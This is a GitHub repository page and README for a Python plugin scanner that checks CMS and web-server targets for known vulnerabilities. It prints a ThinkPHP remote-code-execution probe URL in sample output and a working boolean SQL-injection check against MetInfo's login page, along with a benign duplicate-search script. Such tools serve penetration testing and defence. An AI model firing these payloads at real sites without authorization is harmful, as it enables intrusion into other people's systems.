https://github.com/1oid/cms_poc_exp
CMS vulnerability plugin collection
- Host: GitHub
- URL: https://github.com/1oid/cms_poc_exp
- Owner: 1oid
- Created: 2018-11-25T06:51:10.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2023-08-08T15:34:40.000Z (over 2 years ago)
- Last Synced: 2025-07-12T01:32:38.980Z (8 months ago)
- Language: Python
- Homepage:
- Size: 5.48 MB
- Stars: 107
- Watchers: 3
- Forks: 26
- Open Issues: 0
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - 1oid/cms_poc_exp - CMS vulnerability plugin collection (Python)
README
# cms_poc_exp (scanning version, compatible with pocsuite3 plugin invocation)

___
## Purpose and significance of this project
> My personal time is limited, so this project is made public so that interested people can collect plugins together and provide a strong driver for their own / the author's scanner.
> If you are interested in supporting this project, you can contact me on QQ102102938.
## Project notes
- ~~The plugins in this project now support Python 3 and are no longer compatible with Python 2, so if you want to use [ShellFrameworkd](https://github.com/1oid/Shell-Frameworkd) for batch scanning, modify the plugins yourself to support Python 2~~
- ~~[ShellFrameworkd](https://github.com/1oid/Shell-Frameworkd) batch scanning will later be modified to support Python 3~~
- `ShellFrameworkd` has been renamed to [PocBatch-M](https://github.com/1oid/PocBatch-M) and now supports Python 3
- Updated the pocsuite3 plugin invocation, 20211116
- Updated the algorithm and added colour output, 20220301
## Usage
`python3 scan.py -u "http://43.*.*.*" -m dedecms`
```
➜ cms_poc_exp_dev git:(dev) ✗ python3 newscan.py -u "http://localhost:8080" -m thinkphp
[INFO] loaded exploits folder 31
[INFO] loaded 4 plugins for thinkphp
[NOT] check thinkphp_5_0_to_23_rce_captcha_poc2 not vulnerability
[NOT] check thinkphp_5_0_to_23_rce_captcha not vulnerability
[FIND] [ThinkphpRCE] http://localhost:8080?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
[NOT] check thinkphp_5_0_to_20_rce_captcha not vulnerability
```
## Existing CMS plugins
- [dedecms](https://github.com/1oid/cms_poc_exp/tree/master/dedecms)
- [discuz](https://github.com/1oid/cms_poc_exp/tree/master/discuz)
- [emobile](https://github.com/1oid/cms_poc_exp/tree/master/emobile)
- [finecms](https://github.com/1oid/cms_poc_exp/tree/master/finecms)
- [jcms](https://github.com/1oid/cms_poc_exp/tree/master/jcms)
- [maccms](https://github.com/1oid/cms_poc_exp/tree/master/maccms)
- [metinfo](https://github.com/1oid/cms_poc_exp/tree/master/metinfo)
- [phpcms](https://github.com/1oid/cms_poc_exp/tree/master/phpcms)
- [tomcat](https://github.com/1oid/cms_poc_exp/tree/master/tomcat)
- [weblogic](https://github.com/1oid/cms_poc_exp/tree/master/weblogic)
- [wordpress](https://github.com/1oid/cms_poc_exp/tree/master/wordpress)
- [website scanning plugins, other generic vulnerabilities](https://github.com/1oid/cms_poc_exp/tree/master/www)
- [yonyouoa](https://github.com/1oid/cms_poc_exp/tree/master/yongyouoa)
- [zfsoft](https://github.com/1oid/cms_poc_exp/tree/master/zfsoft)
- [jetty](https://github.com/1oid/cms_poc_exp/tree/master/jetty)
- [ecshop](https://github.com/1oid/cms_poc_exp/tree/master/ecshop)
- [74cms](https://github.com/1oid/cms_poc_exp/tree/master/74cms)
## Plugin format
```python
class Exploit:
    def attack(self, url):
        # put the vulnerability verification code here
        return "返回(提示)字符串"  # the (hint) string the scanner prints on a hit
```
Invoked as `Exploit().attack(url)`.
Taking the `metinfo_login_lang_sql` plugin as an example:
```python
import requests
from urllib.parse import quote


class Exploit:
    def attack(self, url):
        # Two requests that differ only in the condition appended to the langset parameter
        true_url = url + "/admin/login/login_check.php?langset=cn" + quote("' and '1' ='1")
        false_url = url + "/admin/login/login_check.php?langset=cn" + quote("' and '1' ='2")
        # timeout added so an unresponsive host does not stall the whole scan
        response = requests.get(true_url, timeout=10)
        response2 = requests.get(false_url, timeout=10)
        # a hit is reported only when the two responses differ in the expected way
        if 'not have this language' in response2.text and 'not have this language' not in response.text:
            return "{} has SQL Injection!".format(true_url)
        # returning None makes the scanner report the plugin as "not vulnerability"
```
## Notes on writing plugins
- No duplicate plugins: a `find.py` has been added that searches the existing scripts by feature string, to check whether a plugin with the given feature already exists.
  Usage:
  - Method 1: `python3 find.py <cms> <feature>`, e.g. `python3 find.py dedecms /install/index.php`
  - Method 2: `python3 find.py <feature>`, e.g. `python3 find.py /install/index.php` (if no CMS is given, all local plugins are searched)
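The duplicate search described above, re-implemented as an added example (this is not the project's own `find.py`): it walks the plugin tree, optionally restricted to one CMS folder, and lists every `.py` file whose source contains the feature string. The folder layout, the `[DUP]` label and the sample plugin files are assumptions constructed for the demonstration.

```python
import sys
import tempfile
from pathlib import Path


def find_feature(root, feature, cms=None):
    """Plugin files under root (or root/cms) whose source contains `feature`, relative to root."""
    root = Path(root)
    base = root / cms if cms else root
    if not base.is_dir():  # unknown CMS folder: nothing to search, so no duplicates
        return []
    hits = []
    for path in base.rglob("*.py"):
        text = path.read_text(encoding="utf-8", errors="ignore")
        if feature in text:
            hits.append(path.relative_to(root).as_posix())
    return sorted(hits)


def parse_args(argv):
    """Accept the two call forms from the README: `find.py <cms> <feature>` or `find.py <feature>`."""
    if len(argv) == 2:
        return argv[0], argv[1]
    if len(argv) == 1:
        return None, argv[0]
    raise SystemExit("usage: find.py [cms] feature")


def build_sample_tree():
    """Constructed plugin tree (sample data for this example, not the project's files); stubs send no requests."""
    root = Path(tempfile.mkdtemp(prefix="cms_poc_exp_sample_"))
    stub = 'class Exploit:\n    def attack(self, url):\n        return url + "{}"\n'
    files = {
        "dedecms/dedecms_install_poc.py": stub.format("/install/index.php"),
        "dedecms/dedecms_other_poc.py": stub.format("/placeholder/other.php"),
        "metinfo/metinfo_login_lang_sql.py": stub.format("/admin/login/login_check.php"),
        "www/generic_install_poc.py": stub.format("/install/index.php"),
    }
    for rel, src in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(src, encoding="utf-8")
    return str(root)


if __name__ == "__main__":
    if len(sys.argv) > 1:  # real usage: search the current checkout
        cms, feature = parse_args(sys.argv[1:])
        matches = find_feature(".", feature, cms)
    else:  # no arguments: demonstrate on the constructed tree
        matches = find_feature(build_sample_tree(), "/install/index.php")
    for hit in matches:
        print("[DUP] an existing plugin already contains the feature:", hit)
```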
## People currently supporting / contributing to this project
- [1oid (author)](https://github.com/1oid)
- [ske](https://github.com/SkewwG/) provided plugins of their own, [VulScan](https://github.com/SkewwG/VulScan)
- [LiodAir](https://github.com/LiodAir) submitted a branch
- [icetea1](https://github.com/icetea1) submitted new CMS entries and PoCs